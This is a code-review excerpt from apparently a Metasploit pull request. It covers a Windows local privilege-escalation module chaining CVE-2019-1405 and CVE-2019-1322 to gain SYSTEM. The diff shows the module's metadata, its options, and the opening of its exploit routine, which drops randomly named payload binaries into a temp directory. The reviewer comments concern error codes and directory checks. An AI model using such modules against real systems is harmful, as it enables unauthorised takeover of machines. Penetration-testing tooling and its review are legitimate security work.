modules/exploits/windows/local/comahawk.rb

```diff
@@ -0,0 +1,147 @@
+      The first (CVE-2019-1405) uses the UPnP Device Host Service to elevate to
+      NT AUTHORITY\LOCAL SERVICE
+      The second (CVE-2019-1322) leverages the Update Orchestrator Service to
+      elevate from NT AUTHORITY\LOCAL SERVICE to NT AUTHORITY\SYSTEM.
+      ),
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'NCC Group',            # Original discovery (https://www.nccgroup.trust/uk/)
+          'hoangprod',            # PoC
+          'bwatters-r7'           # msf module
+        ],
+      'Platform'       => ['win'],
+      'SessionTypes'   => ['meterpreter'],
+      'Targets'        =>
+        [
+          ['Windows x64', { 'Arch' => ARCH_X64 }]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Nov 12 2019',
+      'References'     =>
+        [
+          ['CVE', '2019-1322'],
+          ['CVE', '2019-1405'],
+          ['EDB', '47684'],
+          ['URL', 'https://github.com/apt69/COMahawk'],
+          ['URL', 'https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/november/cve-2019-1405-and-cve-2019-1322-elevation-to-system-via-the-upnp-device-host-service-and-the-update-orchestrator-service/'],
+          ['URL', 'https://fortiguard.com/threat-signal-report/3243/new-proof-of-concept-combining-cve-2019-1322-and-cve-2019-1405-developed-1']
+        ],
+      'DefaultOptions' =>
+        {
+          'DisablePayloadHandler' => 'False'
+        }
+    ))
+
+    register_options([
+      OptString.new('EXPLOIT_NAME',
+        [false, 'The filename to use for the exploit binary (%RAND% by default).', nil]),
+      OptString.new('PAYLOAD_NAME',
+        [false, 'The filename for the payload to be used on the target host if (%RAND%.exe by default).', nil]),
+      OptString.new('PATH',
+        [false, 'Path to write binaries if (%TEMP% by default).', nil]),
+      OptInt.new('EXPLOIT_TIMEOUT',
+        [true, 'The number of seconds to wait for exploit to finish running', 60]),
+      OptInt.new('EXECUTE_DELAY',
+        [true, 'The number of seconds to delay between file upload and exploit launch', 3])
+    ])
+  end
+
+  def exploit
+    exploit_name = datastore['EXPLOIT_NAME'] || Rex::Text.rand_text_alpha((rand(8) + 6))
+    payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(8) + 6))
+    exploit_name = "#{exploit_name}.exe" unless exploit_name.end_with?('.exe')
+    payload_name = "#{payload_name}.exe" unless payload_name.end_with?('.exe')
+    temp_path = datastore['PATH'] || session.sys.config.getenv('TEMP')
+    payload_path = "#{temp_path}\\#{payload_name}"
+    exploit_path = "#{temp_path}\\#{exploit_name}"
+    payload_exe = generate_payload_exe
+
+    # Check target
+    vprint_status("Checking Target")
+    validate_active_host
+    validate_target
+    fail_with(Failure::Unreachable, "#{temp_path} does not exist on the target") unless directory?(temp_path)
```

Comment:
Given that `temp_path` is user configurable, and uses `%TEMP%` only out of convenience  (not necessity) due to being writable, `Failure::BadConfig` would make more sense here.

```suggestion
    fail_with(Failure::BadConfig, "#{temp_path} does not exist on the target") unless directory?(temp_path)
```

Also, perhaps checking if the directory is writable would be a good idea ?

Reply:
> Also, perhaps checking if the directory is writable would be a good idea ?

Welp. Disregard.

```ruby
  #
  # See if +path+ on the remote system exists and is writable
  #
  # @param path [String] Remote path to check
  #
  # @return [Boolean] true if +path+ exists and is writable
  #
  def writable?(path)
    raise "`writable?' method does not support Windows systems" if session.platform == 'windows'

    cmd_exec("test -w '#{path}' && echo true").to_s.include? 'true'
  end
```